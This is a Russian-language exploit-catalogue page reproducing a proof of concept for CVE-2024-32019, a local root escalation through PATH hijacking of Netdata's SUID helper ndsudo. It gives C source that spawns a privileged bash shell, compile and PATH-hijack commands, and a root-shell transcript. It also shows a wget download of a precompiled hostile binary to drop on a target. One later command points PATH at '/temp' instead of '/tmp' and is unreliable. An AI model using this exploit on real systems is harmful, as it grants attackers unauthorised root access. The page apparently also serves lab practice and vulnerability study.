Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-32019-POC — Netdata ndsudo: локальная эскалация привилегий — последовательность действий и POC (CVE-2024-32019) | Kitploit
Инструменты/GitHubGitHub/juanbelin/cve-2024-32019-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubjuanbelin/cve-2024-32019-poc

CVE-2024-32019-POC

Netdata ndsudo: локальная эскалация привилегий — последовательность действий и POC (CVE-2024-32019)

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-32019-POC

Netdata ndsudo локальная эскалация привилегий: описание и POC (CVE-2024-32019)

  • Описание
  • Автоматический эксплойт
  • Ресурсы

Описание

[!TIP] Пожалуйста, прочитайте

Netdata — это инструмент для мониторинга приложений и систем. Он работает на порту 19999, что легко обнаружить:

root@kitploit:~
test@test:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State     

tcp        0      0 127.0.0.1:19999         0.0.0.0:*               LISTEN  

Эта уязвимость (CVE-2024-32019) затрагивает следующие версии: >= v1.45.0, < v1.45.3, >= v1.44.0-60, < v1.45.0-169. Мы можем сделать запрос, чтобы узнать версию в заголовке ответа:

CVE-2024-32019-1

Эксплойт основан на использовании PATH Hijacking одного из его плагинов, ndsudo, который часто находится в /opt/netdata/usr/libexec/netdata/ и имеет флаг SUID.

root@kitploit:~
test@test:~$ find / -name ndsudo 2> /dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
CVE-2024-32019-2

Посмотрим, что можно сделать с помощью --help:

root@kitploit:~
$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help

ndsudo

(C) Netdata Inc.

A helper to allow Netdata run privileged commands.

  --test
    print the generated command that will be run, without running it.

  --help
    print this message.

The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json

- Command    : nvme-smart-log
  Executables: nvme 
  Parameters : smart-log {{device}} --output-format=json

- Command    : megacli-disk-info
  Executables: megacli MegaCli 
  Parameters : -LDPDInfo -aAll -NoLog

- Command    : megacli-battery-info
  Executables: megacli MegaCli 
  Parameters : -AdpBbuCmd -aAll -NoLog

- Command    : arcconf-ld-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 LD

- Command    : arcconf-pd-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 PD

The program searches for executables in the system path.

Variables given as {{variable}} are expected on the command line as:
  --variable VALUE

VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
root@kitploit:~
test@test:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info
arcconf : not available in PATH.

Как видим, поскольку скрипт содержит несколько команд, каждая из которых ищет исполняемый файл, мы можем этим воспользоваться, создав собственный исполняемый файл с именем одного из указанных в скрипте и добавив путь к нему в переменную окружения PATH.

Netdata использует язык C, поэтому нам нужно написать скрипт на C и скомпилировать его.

CVE-2024-32019
root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-p", NULL);
    perror("execl");
    return 1;
}
root@kitploit:~
gcc arcconf.c -o arcconf

Затем, как обсуждалось ранее, добавляем путь к нашему скрипту в переменную $PATH:

root@kitploit:~
test@test:/tmp$ PATH=/tmp:$PATH

Наконец, просто выполняем команду, которая указывает на наш вредоносный исполняемый файл (arcconf-pd-info → arcconf), и она даст нам привилегированную оболочку:

root@kitploit:~
test@test:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-pd-info
root@editor:/tmp# whoami
root

Автоматический эксплойт

Вы можете скачать уже скомпилированный вредоносный скрипт на C (как в примере выше), который даст вам оболочку с правами root:

root@kitploit:~
wget https://github.com/juanbelin/CVE-2024-32019-POC/raw/refs/heads/main/arcconf 
root@kitploit:~
mv arcconf /tmp # Если у вашей цели есть доступ в Интернет

scp ./arcconf test@test:/tmp/arcconf # Если у вашей цели нет доступа в Интернет
root@kitploit:~
PATH=:/temp:$PATH
root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info # Путь ndsudo может отличаться

Ресурсы

  • https://learn.netdata.cloud/docs/collecting-metrics/

  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

  • https://app.hackthebox.com/machines/684

Скачать инструмент